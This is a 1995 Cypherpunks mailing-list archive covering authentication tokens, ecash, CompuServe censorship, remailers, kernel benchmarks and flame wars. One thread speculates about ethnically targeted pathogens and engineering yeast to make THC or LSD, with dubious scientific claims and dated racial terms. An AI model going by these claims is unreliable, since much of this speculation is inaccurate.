12:35:29 +0800 Subject: Is Dr Fred Cohen a Loon??? In-Reply-To: <2.2.32.19951231025816.0074caa0@mail.interlog.com> Message-ID: <199512310246.VAA00949@localhost.cjs.net> > I am neither attacking nor defending Fred Cohen; I don't know him from Adam, > and haven't read his messages or his book. But since you asked for where ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ You should. They're hysterical. The man hasn't a clue to his name. > you can find Cohen's published work, there's one answer (assuming it's the > same Fred Cohen). Christopher From Alan.Pugh at internetMCI.COM Sat Dec 30 21:40:40 1995 From: Alan.Pugh at internetMCI.COM (amp) Date: Sun, 31 Dec 1995 13:40:40 +0800 Subject: Australian "calculatorcard" Message-ID: <01HZFQH4O0R695OXTW@MAIL-CLUSTER.PCY.MCI.NET> -- [ From: amp * EMC.Ver #2.3 ] -- -----BEGIN PGP SIGNED MESSAGE----- From: Cees de Groot \ Internet: (cg at bofh.toad.com) To: cypherpunks \ Internet: (cypherpunks at toad.com) Subject: Australian "calculatorcard" Hi everybody, CG> Yesterday, on UK Discovery, there was an item in the programme CG> Beyond 2000 about an Australian card which implements a CG> challenge-response protocol and can be used for banking, etcetera. CG> Basically, you give your card number (over the phone), get a CG> challenge number, enter your pin and the challenge, and then give the CG> response. All in CC format... sounds like the card i use for remote dialup to certain non-public systems i use at work. it has a six digit number on the front that changes every 60 seconds. the card is registered to me. when i enter my username/password i'm prompted for the number. it's Pretty Good (tm) security, but like anything not biometric, it is vulnerable to black-bag attacks. physical possession being all that is required. if you know the algorithm and the serial number of the card and the time, even that isn't necessary. CG> Can anybody provide me with pointers to more in-depth information CG> about this device and the algorithm(s) behind it ? i don't know if there are any net sources for them, but i'd be suprised if not. my card references "security dynamics" of cambridge massachusetts. amp <0003701548 at mcimail.com> (since 10/31/88) PGP Key = 57957C9D PGP FP = FA 02 84 7D 82 57 78 E4 E2 1C 7B 88 62 A6 F9 F7 December 30, 1995 23:29 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMOYRtIdTfgZXlXydAQGengf9EH07ubUAH43THj3l+6kWUjnXDYfe2DFj CvpEKlFoDkxwllDcIX0KfWK+ENr3YzyQp/yuWU+ZAw/ogci3y5r4IF+oJ4ItrVD6 pZ4AzF5NvXb2KWcnSaQoVsfo3yIt0bfRknuQjGyirntNhLpTkObVygbUmSSNeT8S hrpGB85IkEoy/km3pntCMfrfA0BrED3GCnNLxVYupY7jM7AxbD+mjHvS8to63bPv 68xjB93b+78ld/O0FPsOP7GQMbUZyTJMiLoNwiMhbgEi8Y4dFTlZ6mF6NMHsDxDy p/ocbp2dOj0Vy/BFbfbBqCgdjY3FoExRRHpgav8b0Xd4qNydkFDelg== =MSp2 -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Sat Dec 30 21:54:18 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 31 Dec 1995 13:54:18 +0800 Subject: Is Dr Fred Cohen a Loon??? In-Reply-To: <199512310155.TAA12831@dal1820.computek.net> Message-ID: <8iiygD48w165w@bwalk.dm.com> "Ed Carp [khijol SysAdmin]" writes: [yet another very long flame directed at Dr. Fred Cohen] > Just remember - PhD means 'piled higher and deeper'. > - -- > Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com > 214/993-3935 voicemail/digital pager > 800/558-3408 SkyPager > Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ^^^^^^^^^^^^^^^^^^^^^ I wonder why you put your anon.penet.fi address in your signature. There may be a perfectly reasonable explanation that I didn't think of :) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From zinc at zifi.genetics.utah.edu Sat Dec 30 22:38:48 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Sun, 31 Dec 1995 14:38:48 +0800 Subject: (NOISE) Re: PLA_gue Germ Terrorism In-Reply-To: <199512310354.VAA02877@edge.edge.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 30 Dec 1995, jonnyx wrote: > Date: Sat, 30 Dec 1995 21:54:15 -0600 (CST) > From: jonnyx > To: cypherpunks at toad.com > Subject: (NOISE) Re: PLA_gue Germ Terrorism > > In a recent message, John Young babbled: > < GIANT snip > am i troll-bait or what? > Think that's fun? How 'bout this: given that the initial "mapping" > phase of the human genome project is nearly complete, and the huge > amount of genetic information available on the net, PLUS ever- > more-powerful-yet-less-costly computers anyone can purchase, just > how long do y'all think it'll be before some nut whips up a bug > that targets, say, people with negroid genetic characteristics? > Or epicanthic folds? Or blonde hair? this is so much shit. targetting anything is very difficult. just ask all those people about the wonders of gene therapy. hell, even the economist had an article about it's failures recently (Dec 16-22 1995, p77). in any event the so-called 'differences' you are imagining are phenotypes. these are a long cry from DNA. i'm not aware of any genetic markers available to distinguish a black man from a white man. and, even if there were, recombination requires long stretches of homology between DNAs, not small differences. i'd bet it's nearly impossible to target black vs white vs yellow vs a gorilla. > Seem kinda far-fetched? The November NUTS & VOLTS has a nifty yes. - -pjf patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA! ** FINGER zinc-pgp at zifi.genetics.utah.edu for pgp public key - CRYPTO! zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOYZtk3Qo/lG0AH5AQFFlAQAq/F+kLRXqyQZm9pIWMaXw8UWu3f4KERb CKTBDCQqFiskwu1KOusB9vz3TwTAB2n7qzOBoTA69iPWXoAFW9yzHlEDTnKFmZbz DTr9VNoNYkG8jlTA1Z5sBkjzPUAEFg7Gc2X2qrahE8hOWVEKdS220bhF1TEXdevD f2Zj5hD88bI= =BMiz -----END PGP SIGNATURE----- From daw at boston.CS.Berkeley.EDU Sat Dec 30 22:45:36 1995 From: daw at boston.CS.Berkeley.EDU (David A Wagner) Date: Sun, 31 Dec 1995 14:45:36 +0800 Subject: [ecash] Re: Multi-issuer questions Message-ID: <199512310504.AAA18856@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I have to admit I don't know the ecash concepts well enough to respond very intelligently to everything you talked about, though I'd like to address one of your comments on inter-bank clearing. I wanted to bring up one misconception: you mention that the main worth of ecash is measured by whether merchants will accept it as payment, and that whether a bank will accept it as a deposit is just a secondary issue. From this you conclude that so long as a merchant can validate ecash (via online clearing, to detect double-spending), it doesn't really matter whether that merchant's bank will accept the ecash -- just that other merchants will accept the ecash. This is brought up in the context of "what if Bank B didn't accept [deposits of] ecash from Bank A?". I claim that this is at best misleading, because with Digicash's ecash, when a merchant receives ecash as payment, the ecash is "made out" to that particular merchant, and is non-transferable-- i.e. can't be used as payment to another merchant. When you've been payed Digicash ecash, about the only interesting thing you can do is deposit it with your bank. [ For simplicity, I'm ignoring wildcards in the "pay to" field; but wildcards are insecure on their own. Digicash hasn't really attempted to support wildcards or transferable ecash in general, as far as I can tell. Correct me if I'm wrong. ] - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMOYZwCoZzwIn1bdtAQFvaQGA1f4oy6Z2TF9810fIUEqkktpQN01FPUCb ER/q3WI/kuyjQCBJh/laA0QsU2q8jnP4 =8Mib -----END PGP SIGNATURE----- From erc at dal1820.computek.net Sat Dec 30 22:52:33 1995 From: erc at dal1820.computek.net (Ed Carp [khijol SysAdmin]) Date: Sun, 31 Dec 1995 14:52:33 +0800 Subject: Is Dr Fred Cohen a Loon??? In-Reply-To: <8iiygD48w165w@bwalk.dm.com> Message-ID: <199512310509.XAA24032@dal1820.computek.net> -----BEGIN PGP SIGNED MESSAGE----- > "Ed Carp [khijol SysAdmin]" writes: > [yet another very long flame directed at Dr. Fred Cohen] Well, it wasn't directed specifically at Fred... > > Just remember - PhD means 'piled higher and deeper'. > > Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi > I wonder why you put your anon.penet.fi address in your signature. > There may be a perfectly reasonable explanation that I didn't think of :) Well, yes, there is. :) It's so that folks may correspond with me anonymously if they wish to do so. Some people don't want me knowing who they are.... - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/digital pager 800/558-3408 SkyPager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi "Past the wounds of childhood, past the fallen dreams and the broken families, through the hurt and the loss and the agony only the night ever hears, is a waiting soul. Patient, permanent, abundant, it opens its infinite heart and asks only one thing of you ... 'Remember who it is you really are.'" -- "Losing Your Mind", Karen Alexander and Rick Boyes -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOYbDyS9AwzY9LDxAQFMLAP/Z1Y6XkSBpX+EA/ooiOU5hfn4Sx0+pWH+ pe4SHGhS7B9iSqX55/3YNq16ZXeA/mBzqF0d9XiWUZa/Qs8u5MaFqID1BbHM65Bk DrhGcP5YDSDLykY1z7mzLw9ItHM35UUDvygk0M3CNcerEZZd5C29kfg3SkwgOh55 aFNE8vMbsbU= =LTOA -----END PGP SIGNATURE----- From jburrell at crl.com Sat Dec 30 23:02:31 1995 From: jburrell at crl.com (Jason Burrell) Date: Sun, 31 Dec 1995 15:02:31 +0800 Subject: Massey, CEO of Compuserve, on Internet In-Reply-To: <199512310220.NAA16258@oznet02.ozemail.com.au> Message-ID: On Sun, 31 Dec 1995, Mark Neely wrote: > I assume that C$ is only filtering the newsfeed as it hits German shores? > Please tell me > they aren't denying access to these "banned" newsgroups for all users worldwide! > > Mark Unfortunately, that's exactly what they're doing. Check out comp.org.eff.talk for more a discussion of it. From blancw at accessone.com Sat Dec 30 23:13:31 1995 From: blancw at accessone.com (blanc) Date: Sun, 31 Dec 1995 15:13:31 +0800 Subject: last straw (or Possible Developments re Censorship) Message-ID: <01BAD6FD.B8FBF560@blancw.accessone.com> From: Dr. Dimitri Vulis And now comes the *point*: There's much information on CompuServe that cannot be accessed from the outside. One example is the very informative National Computer Security Association's forum. ...[etc.] ................................................................................................... Aside from the obvious implications to liberty, of the backing down from standing up (!) to the demand for self-censorship, I was thinking about other possible developments: Since, as 'Dr. Dimitri' mentions, CompuServe offers some info which is not available from other sources - and this info is often quite useful/valuable to business enterprises, such that they and other individuals would not be too keen on abandoning these immediately just for the principle of the thing - it could develop that those who are willing and can afford it, will end up "supporting", or getting services from, different providers based on the particular services which they offer. This could represent a partial solution (in my mind, at least, not being inclined toward blanket censorship of all things discomfitting to my sensibilities) to the matter of there being free-radical electrons "out there" existing in the form & shape of various degrees of sexual permutations: . Those concerned that their children may innocently surf over to alt.binaries.naughty.nude.x-rated.pictures and see alarming truths about adult behavior, and don't want to purchase the available filtering software, could subscribe to CompuServe and rest assured that their children would only have access to safe, industrial-strength info on that account. . Those wishing want to discuss their sexually-related personal problems, or who are pleased to just look at/talk about sex et al, could continue do so through their subscription to the adult bbs-es or local ISPs providing uncensored access to all newsgroups. It could develop that large companies providing internet access will seek to distinguish/identify themselves (as they are tending to do already) between the pablum-feeding family-types like AOL, or corporate/business-types like CompuServe, or free-for alls like local ISPs. Such developments of course would depend on a tolerance for the existence of those un-specialized carriers which aren't adverse to transmitting controversial, "sensitive" content. These divisions among services might still not be acceptable to States and Nations & other 'busybodies', but the resistance to such developments would only serve to more explicitly define the problem; it could make prominent the real issue of people's attitudes, fears, and expectations concerning sex & human nature, and of the obstacles in the way of achieving personal responsibility regarding these (among other things). .. Blanc From dlv at bwalk.dm.com Sat Dec 30 23:23:21 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 31 Dec 1995 15:23:21 +0800 Subject: Is Dr Fred Cohen a Loon??? In-Reply-To: <199512310509.XAA24032@dal1820.computek.net> Message-ID: "Ed Carp [khijol SysAdmin]" writes: > > I wonder why you put your anon.penet.fi address in your signature. > > There may be a perfectly reasonable explanation that I didn't think of :) > > Well, yes, there is. :) It's so that folks may correspond with me > anonymously if they wish to do so. Some people don't want me knowing who > they are.... This is fascinating! Could you please explain (for the benefit of clueless Ph.D.'s like myself) how putting your anon id in your signature enables folks to send you anonymous e-mail, who couldn't do that before by e-mailing anon at anon.penet.fi and adding: X-Anon-To: erc at dal1820.computek.net (E-mailing erc%dal1820.computek.net at anon.penet.fi might work too.) I do see how it stops you from being anonymous when you post via that particular anon.penet.fi address, but that's a different issue. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From erc at dal1820.computek.net Sat Dec 30 23:33:17 1995 From: erc at dal1820.computek.net (Ed Carp [khijol SysAdmin]) Date: Sun, 31 Dec 1995 15:33:17 +0800 Subject: Compuserve and copyrights Message-ID: <199512310542.XAA25896@dal1820.computek.net> -----BEGIN PGP SIGNED MESSAGE----- I have sent Compuserve a notice that all posts originating from this site are copyrighted and barred from being stored on a site that does not allow reciprocal access. I would urge that other sites consider sending a similar notice to Compuserve. - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/digital pager 800/558-3408 SkyPager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi "Past the wounds of childhood, past the fallen dreams and the broken families, through the hurt and the loss and the agony only the night ever hears, is a waiting soul. Patient, permanent, abundant, it opens its infinite heart and asks only one thing of you ... 'Remember who it is you really are.'" -- "Losing Your Mind", Karen Alexander and Rick Boyes -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOYi1SS9AwzY9LDxAQFdagP/VMdunjZ1LLY7nUVgxUgFEoHDdcyPwWLl oPTQ/jDdcsIfolBQlNp+IzKJyubutW7oUv0qmsInAlXBUDPGvTmgyhPVczud7U79 JQh/ssxCiWZbTHwwwpJyg8Iw+jjAvrNTe4sWh/NOCM/Y3+knIckEm8k5DXA3BTCV 0+fkcV6sf+o= =dQU8 -----END PGP SIGNATURE----- From jcorgan at aeinet.com Sun Dec 31 00:09:35 1995 From: jcorgan at aeinet.com (Johnathan Corgan) Date: Sun, 31 Dec 1995 16:09:35 +0800 Subject: Australian "calculatorcard" Message-ID: <199512310627.WAA11299@scruz.net> >sounds like the card i use for remote dialup to certain non-public >systems i use at work. it has a six digit number on the front that >changes every 60 seconds. the card is registered to me. when i enter >my username/password i'm prompted for the number. it's Pretty Good >(tm) security, but like anything not biometric, it is vulnerable to >black-bag attacks. physical possession being all that is required. if >you know the algorithm and the serial number of the card and the >time, even that isn't necessary. > > >CG> Can anybody provide me with pointers to more in-depth information >CG> about this device and the algorithm(s) behind it ? > >i don't know if there are any net sources for them, but i'd be >suprised if not. my card references "security dynamics" of cambridge >massachusetts. You are referring to the ACE/SecurID token card from Security Dynamics. In addition to the displayed number, you should be prepending it with a memorized PIN; this prevents operation in case of theft. The server end will disable the card after x failed attemps, etc. Otherwise it is basically a one-time password system. I've had a business relationship with these folks for a year or so now-- sharp guys. From cjs at netcom.com Sun Dec 31 00:15:55 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Sun, 31 Dec 1995 16:15:55 +0800 Subject: Is Dr Fred Cohen a Loon??? In-Reply-To: Message-ID: <199512310524.AAA01241@localhost.cjs.net> > "Ed Carp [khijol SysAdmin]" writes: > > > I wonder why you put your anon.penet.fi address in your signature. > > > There may be a perfectly reasonable explanation that I didn't think of :) > > > > Well, yes, there is. :) It's so that folks may correspond with me > > anonymously if they wish to do so. Some people don't want me knowing who > > they are.... > > This is fascinating! Could you please explain (for the benefit of > clueless Ph.D.'s like myself) how putting your anon id in your > signature enables folks to send you anonymous e-mail, who couldn't > do that before by e-mailing anon at anon.penet.fi and adding: > X-Anon-To: erc at dal1820.computek.net > I do see how it stops you from > being anonymous when you post via that particular anon.penet.fi > address, but that's a different issue. Gee.. you would think a high and mighty Ph.D like yourself could do a little better then petty-bickering. Christopher From ravage at ssz.com Sun Dec 31 00:20:49 1995 From: ravage at ssz.com (Jim Choate) Date: Sun, 31 Dec 1995 16:20:49 +0800 Subject: (NOISE) Re: PLA_gue Germ Terrorism In-Reply-To: <199512310354.VAA02877@edge.edge.net> Message-ID: <199512310701.BAA01450@einstein.ssz.com> > Think that's fun? How 'bout this: given that the initial "mapping" > phase of the human genome project is nearly complete, and the huge > amount of genetic information available on the net, PLUS ever- > more-powerful-yet-less-costly computers anyone can purchase, just > how long do y'all think it'll be before some nut whips up a bug > that targets, say, people with negroid genetic characteristics? > Or epicanthic folds? Or blonde hair? > Malarky. > Seem kinda far-fetched? The November NUTS & VOLTS has a nifty > six page article on garage genetic experimentation (how to convert > that old aquarium into an incubator, culturing techniques, etc.). > They even list souces for equipment AND GERMS. Yes folks, you can > order your very own "E-Z Gene Splicer DNA Recombination and > Transformation Kit" from the good folks at Images Company, POBox > 140742, Staten Island NY 10314, (718) 698-8305, $49.95 each, > not recommended for children under 6 (too many parents complaining > about mutated family cats). > While it is quite possible to obtain equipment and supplies from any reputable science supply center (I like Brodehead-Garrett & Cenco myself) it is not cheap. The type of equipment that can be made out of aquaria and such is very low-level and poses little threat *provided* isolation proceedures are taken. The types of 'genetic' experiments that can be done at this level are quite simple and generaly explore characteristics that are based on the crossing models of Mendelson. Most of the threat of this type of experiments are from simple infections since viruses are not easily raised with this form of equipment. One of my favorite 'technology rulers' is when the first strain of commen yeast is released which produces THC or LSD. Both of these chemicals are relatively simple to produce at a cellular level and Marijuana was completely mapped just a couple of years ago. Yeast has been mapped for several years and there is a whole technology of protocols based around using it (or E. Coli) for laboratory experiments into secondary and tertiary production systems in cells. The reason that I use Marijuana or LSD as a test is that neither are the result of direct protein synthesis. They are rather produced as a result of cellular metabolism of primary componants. Both of these require garage level control and access to only the most basic tools and sequencers. To do this successfuly will require somebody to take the necessary genomes out of the choromosomes and then using a virus and suitable cutting agents insert them in the yeast. I do not believe we will see this in the near term using the micro-manipulater systems which do direct injection of genetic material because of the cost and utility requirements of such equipment. > Quote from the article: "A word of caution is in order before we > start. Although the materials in the kit are safe, it is important > for you to follow simple procedures to keep the experiment controlled > and nonthreatening." No shit. E-coli bacteria (what the kit uses) > aren't pathogens, but still... I guess every budding young white > supremist/right-wing religious nut/genocidal maniac has to start > somewhere. > E. Coli can be quite toxic. The people who died last year because of the bad burger at the Jack In The Box died from E. Coli. There are hundreds of strains of Esherichi Coli and not all of them are benign. There is also a long history of this type of experimentation, it is not new. Scientific American put out a book in the late 50's and early 60's that had a whole slew of 'Amateur Scientist' articles compiled and several of them related to this technology. From proff at suburbia.net Sun Dec 31 00:44:18 1995 From: proff at suburbia.net (Julian Assange) Date: Sun, 31 Dec 1995 16:44:18 +0800 Subject: (fwd) Benchmarks - revs 1.3.50 & 51 Message-ID: <199512310736.SAA06119@suburbia.net> Path: news.apana.org.au!goliath.apana.org.au!sysx.apana.org.au!sleeper.apana.org.au!greathan.apana.org.au!news-mail-gateway From: fluido at marktest.pt (Carlo Emilio Prelz) Newsgroups: apana.lists.os.linux.kernel Subject: Benchmarks - revs 1.3.50 & 51 Date: Thu, 28 Dec 1995 08:05:17 +0100 (MET) Organization: Mail-to-News Gateway Lines: 158 Sender: daemon at greathan.apana.org.au Approved: usenet at greathan.apana.org.au Distribution: apana Message-ID: NNTP-Posting-Host: greathan.apana.org.au Hi. Here follow the benchmark comparisons w.r.t. revisions 50 & 51. I decided to wait before posting rev 50 before because the file read & write results again bounced up with it, and I spent some (very little) time trying to see if I could have done anything to cause that. With no results, as usual. Now I also have results for the "greased weasel", and I decided to send out my numbers for what they're worth. Not much has changed with the latest release... I repeat my query: if anybody has suggestions about these huge jumps in disk performance, please let me know. I am ALWAYS running the benchmark test after a reboot. I login as root, start the process in background and log out, and then generally go to sleep. The machine is NOT online, and is not doing anything important at night. I have not changed anything in the kernel config in the latest 3 revisions. I have a plain old ISA disk controller, and two generally fullish disks, but again, the situation did not change notably between 1.3.49 and 1.3.50. And, I now have to admit that I find it faster, for example, to load a huge C file into emacs, and have it do the syntax coloring. I noticed it this morning. No problems in patching & compiling. --8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<-- From: * Linux pimpinel.fluido.org 1.3.49 #77 Fri Dec 22 21:05:57 MET 1995 i486 * Fri Dec 22 21:41:03 MET 1995 To: * Linux pimpinel.fluido.org 1.3.50 #78 Mon Dec 25 11:18:00 MET 1995 i486 * Mon Dec 25 12:11:11 MET 1995 ******* Results ******* File Write (30 seconds) || 1000.0 -> 9460.0 +846.00% File Write (10 seconds) || 1200.0 -> 8070.0 +572.50% File Copy (30 seconds) || 968.0 -> 2636.0 +172.31% File Copy (10 seconds) || 1024.0 -> 2645.0 +158.30% Execl Throughput Test || 67.9 -> 85.3 +25.63% C Compiler Test || 48.7 -> 51.9 +6.57% Pipe-based Context Switching Test || 9863.0 -> 10493.0 +6.39% Process Creation Test || 347.7 -> 368.9 +6.10% Shell scripts (1 concurrent) || 96.4 -> 101.9 +5.71% Shell scripts (4 concurrent) || 25.5 -> 26.5 +3.92% Shell scripts (2 concurrent) || 50.8 -> 52.6 +3.54% System Call Overhead Test || 29945.4 -> 30523.5 +1.93% Dhrystone 2 using register variables || 49658.9 -> 49910.8 +0.51% Arithmetic Test (type = int) || 8365.0 -> 8377.5 +0.15% Arithmetic Test (type = double) || 5063.6 -> 5071.1 +0.15% Recursion Test--Tower of Hanoi || 726.1 -> 727.1 +0.14% Arithmetic Test (type = arithoh) || 127103.2 -> 127265.6 +0.13% Arithmetic Test (type = short) || 7508.8 -> 7515.5 +0.09% Arithmetic Test (type = register) || 8367.3 -> 8372.8 +0.07% Arithmetic Test (type = float) || 5066.8 -> 5069.3 +0.05% Arithmetic Test (type = long) || 8371.8 -> 8372.1 +0.00% Shell scripts (8 concurrent) || 13.0 -> 13.0 +0.00% Pipe Throughput Test || 17850.0 -> 17726.9 -0.69% Dhrystone 2 without register variables || 51001.9 -> 49772.1 -2.41% File Read (30 seconds) || 4613.0 -> 4404.0 -4.53% File Read (10 seconds) || 4648.0 -> 4390.0 -5.55% Dc: sqrt(2) to 99 decimal places || 11886.7 -> 10822.2 -8.96% --8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<-- From: * Linux pimpinel.fluido.org 1.3.50 #78 Mon Dec 25 11:18:00 MET 1995 i486 * Mon Dec 25 12:11:11 MET 1995 To: * Linux pimpinel.fluido.org 1.3.51 #79 Wed Dec 27 19:16:06 MET 1995 i486 * Wed Dec 27 22:41:23 MET 1995 ******* Results ******* File Read (30 seconds) || 4404.0 -> 4548.0 +3.27% File Read (10 seconds) || 4390.0 -> 4516.0 +2.87% Dc: sqrt(2) to 99 decimal places || 10822.2 -> 11034.2 +1.96% Process Creation Test || 368.9 -> 375.0 +1.65% File Copy (10 seconds) || 2645.0 -> 2683.0 +1.44% File Copy (30 seconds) || 2636.0 -> 2669.0 +1.25% Shell scripts (4 concurrent) || 26.5 -> 26.8 +1.13% C Compiler Test || 51.9 -> 52.4 +0.96% Dhrystone 2 without register variables || 49772.1 -> 49808.7 +0.07% Arithmetic Test (type = long) || 8372.1 -> 8376.6 +0.05% Arithmetic Test (type = register) || 8372.8 -> 8376.1 +0.04% Arithmetic Test (type = float) || 5069.3 -> 5069.9 +0.01% Arithmetic Test (type = short) || 7515.5 -> 7515.7 +0.00% Shell scripts (8 concurrent) || 13.0 -> 13.0 +0.00% Arithmetic Test (type = double) || 5071.1 -> 5067.4 -0.07% Arithmetic Test (type = arithoh) || 127265.6 -> 127172.0 -0.07% Dhrystone 2 using register variables || 49910.8 -> 49870.6 -0.08% Arithmetic Test (type = int) || 8377.5 -> 8370.4 -0.08% Recursion Test--Tower of Hanoi || 727.1 -> 724.3 -0.39% Shell scripts (2 concurrent) || 52.6 -> 52.3 -0.57% Shell scripts (1 concurrent) || 101.9 -> 101.2 -0.69% File Write (30 seconds) || 9460.0 -> 9356.0 -1.10% Pipe Throughput Test || 17726.9 -> 17227.1 -2.82% Pipe-based Context Switching Test || 10493.0 -> 10194.8 -2.84% System Call Overhead Test || 30523.5 -> 29476.8 -3.43% Execl Throughput Test || 85.3 -> 81.5 -4.45% File Write (10 seconds) || 8070.0 -> 7680.0 -4.83% --8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<-- From: * Linux pimpinel.fluido.org 1.2.10 #59 Tue Jun 13 09:46:17 MET DST 1995 i486 * Tue Jun 27 10:18:13 MET DST 1995 To: * Linux pimpinel.fluido.org 1.3.51 #79 Wed Dec 27 19:16:06 MET 1995 i486 * Wed Dec 27 22:41:23 MET 1995 ******* Results ******* Process Creation Test || 119.9 -> 375.0 +212.76% Pipe-based Context Switching Test || 3446.9 -> 10194.8 +195.77% Dc: sqrt(2) to 99 decimal places || 5906.2 -> 11034.2 +86.82% Execl Throughput Test || 51.6 -> 81.5 +57.95% Shell scripts (8 concurrent) || 10.0 -> 13.0 +30.00% Shell scripts (1 concurrent) || 78.3 -> 101.2 +29.25% Shell scripts (4 concurrent) || 21.0 -> 26.8 +27.62% Shell scripts (2 concurrent) || 41.0 -> 52.3 +27.56% C Compiler Test || 42.2 -> 52.4 +24.17% Dhrystone 2 without register variables || 46284.2 -> 49808.7 +7.61% File Write (30 seconds) || 8911.0 -> 9356.0 +4.99% Recursion Test--Tower of Hanoi || 709.2 -> 724.3 +2.13% System Call Overhead Test || 29238.2 -> 29476.8 +0.82% Arithmetic Test (type = float) || 5055.6 -> 5069.9 +0.28% Arithmetic Test (type = long) || 8353.5 -> 8376.6 +0.28% Arithmetic Test (type = register) || 8353.2 -> 8376.1 +0.27% Arithmetic Test (type = short) || 7496.0 -> 7515.7 +0.26% Arithmetic Test (type = double) || 5056.8 -> 5067.4 +0.21% Arithmetic Test (type = int) || 8353.4 -> 8370.4 +0.20% Arithmetic Test (type = arithoh) || 126914.4 -> 127172.0 +0.20% Dhrystone 2 using register variables || 49802.4 -> 49870.6 +0.14% File Write (10 seconds) || 8100.0 -> 7680.0 -5.19% Pipe Throughput Test || 18512.0 -> 17227.1 -6.94% --8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<-- Enjoy! Carlo -- * ...Ma appena fuori tutto e' gomma, * K * Carlo E. Prelz - fluido at marktest.pt tutto e' cicca impiastricciata... * (Marco Zappa-Niente cicca nella scuola) -- +----------------------------------+-----------------------------------------+ |Julian Assange | "if you think the United States has | |FAX: +61-3-9819-9066 | has stood still, who built the largest | |EMAIL: proff at suburbia.net | shopping centre in the world?" - Nixon | +----------------------------------+-----------------------------------------+ From hal9001 at panix.com Sun Dec 31 01:31:10 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Sun, 31 Dec 1995 17:31:10 +0800 Subject: Internet wiretap? Message-ID: At 20:09 12/29/95, Joel McNamara wrote: >This tidbit was posted a few hours ago on c|net (12/29 4:00 PST). > > Thanks to a wiretap on the Internet, three people have been arrested >for illegally > selling and manufacturing cellular phone equipment and electronic >devices over the Internet, > according to Secret Service agent Brian Gimlett. This is the first >time the Secret Service and the > Drug Enforcement Administration were allowed to wiretap via the >Internet, says Gimlett. > >The rest of the story talks about an exchange of e-mail discussing the sale >of various nasty >cellular accessories. There is no information on exactly what "wiretap" >means or any other >technical details. Interesting to note the DEA was in on it. It is not that hard to "tap" a user's account if you are the SMTP server (you just put a Bcc on all outgoing mail and add an extra account to all incoming mail's Envelope). A few lines in the Sendmail parms would do this very simply. From vin at shore.net Sun Dec 31 01:35:43 1995 From: vin at shore.net (Vin McLellan) Date: Sun, 31 Dec 1995 17:35:43 +0800 Subject: Australian "calculatorcard" Message-ID: Cees de Groot (cg at bofh.toad.com) tore himself from the tube to tell us: CG> Yesterday, on UK Discovery, there was an item in the programme CG> Beyond 2000 about an Australian card which implements a CG> challenge-response protocol and can be used for banking, etcetera. CG> Basically, you give your card number (over the phone), get a CG> challenge number, enter your pin and the challenge, and then give the CG> response. All in CC format... Could be one of seven or 8 vendors of so-called "challenge/response" tokens or calculators. Most of those sold in the US and Australia use straight DES (and a token-specific key) to encrypt the "random" challenge number in the token -- but it could be any secret-key algorithm. Actually, the particular environment described -- phone authentication -- is often used as the most notable example of a market where so-called "time-synchonous" tokens hold a notable advantage over challenge/response token. A TS token generates its pseudo-random token-codes continuously and automatically: no buttons, no input. With TS tokens, exact time and a token-specific key are used in a keyed hash to generate a token-code displayed on an LCD on the token for 30 or 60 seconds. The authentication server uses its database record of the token-specific key, time, and the hash to generate the same token-code for a match. This allows a PIN and token-code two-factor authentication to be submitted by touch-tone phone, and it avoids a lot of the hassle (listen/tap/calculate/touch-tone) associated with C/R authentication. As amp noted, the most prominent international vendor of time-synch tokens is a US firm called Security Dynamics, Inc. I've done consulting projects for SDI, off and on, for years. >sounds like the card i use for remote dialup to certain non-public >systems i use at work. it has a six digit number on the front that >changes every 60 seconds. the card is registered to me. when i enter >my username/password i'm prompted for the number. SDI's token is called a SecurID. SDI uses a proprietary hash. The most common app uses a SecurID in a protocol which prepends the PIN, in the clear, to the PRN token-code. (In client/server environments, of course, all communication between an SDI ACE/Client and the ACE/Server is fully encrypted.) SecurIDs can also be loaded with up to three different seeds or keys -- with a pressure-point in one corner to switch between each series of key-based PRNs. For greater security in open networks, SDI sells a PinPad token with a keypad that allows a PIN to be "added" to the PRN token-code -- so the LCD displays a 6-8 digit number (or alphanumeric) which still offers two-factor authentication, without exposing a PIN. > it's Pretty Good >(tm) security, but like anything not biometric, it is vulnerable to >black-bag attacks. physical possession being all that is required. Actually, all ACE/Server or ACE software modules _require_ a user-memorized PIN. Physical possession of a stolen token is not enough to gain illicit access. >if >you know the algorithm and the serial number of the card and the >time, even that isn't necessary. 